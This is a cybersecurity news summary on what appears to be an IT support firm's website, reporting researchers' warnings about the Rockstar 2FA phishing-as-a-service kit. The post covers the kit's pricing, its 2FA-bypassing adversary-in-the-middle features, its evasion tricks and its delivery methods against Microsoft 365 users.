Now Hiring: Are you a driven and motivated 1st Line IT Support Engineer?

 

Call Anytime 24/7

 
Mail Us For Support
 
Office Address

Phishing-as-a-Service “Rockstar 2FA” Targets Microsoft 365 Users with AiTM Attacks

  • Home
  • cyber security
  • Phishing-as-a-Service “Rockstar 2FA” Targets Microsoft 365 Users with AiTM Attacks
Phishing Attacks

Cybersecurity researchers have issued warnings about a new wave of malicious email campaigns leveraging a phishing-as-a-service (PhaaS) toolkit named Rockstar 2FA, which is designed to steal Microsoft 365 account credentials.

Key Points:

Nature of Attack:

• AiTM Attack: The campaign uses an adversary-in-the-middle (AiTM) attack to intercept user credentials and session cookies, rendering multi-factor authentication (MFA) insufficient.
• Trustwave Insight: Researchers Diana Solomon and John Kevin Adriano from Trustwave have highlighted the threat posed by this toolkit.

Toolkit Details:

• Updated Phishing Kit: Rockstar 2FA is considered an updated version of the DadSec (Phoenix) phishing kit, tracked by Microsoft under Storm-1575.
• Subscription Model: Advertised on platforms like ICQ, Telegram, and Mail.ru, available for $200 (two weeks) or $350 (a month).

Features:

• 2FA Bypass & Cookie Harvesting: Bypasses two-factor authentication and harvests cookies.
• Antibot Protection: Includes antibot measures and mimics popular login page themes.
• Admin Panel: Offers a user-friendly admin panel to track campaigns and customize phishing themes.

Campaign Techniques:

• Initial Access Vectors: Uses URLs, QR codes, and document attachments in emails from compromised accounts.
• Antispam Evasion: Employs legitimate link redirectors and antibot checks via Cloudflare Turnstile.

Observed Activity:

• Leveraging Trusted Platforms: Uses services like Atlassian Confluence, Google Docs Viewer, and Microsoft OneDrive to host phishing links.
• Phishing Page Design: Imitates sign-in pages closely while exfiltrating credentials to AiTM servers.

Additional Findings:

• Related Campaigns: Malwarebytes reported a campaign named Beluga using .HTM attachments to steal Microsoft OneDrive credentials.
• Social Media Phishing: Links and ads pushing adware and fraudulent financial apps on social media platforms.

Leave A Comment

Your email address will not be published. Required fields are marked *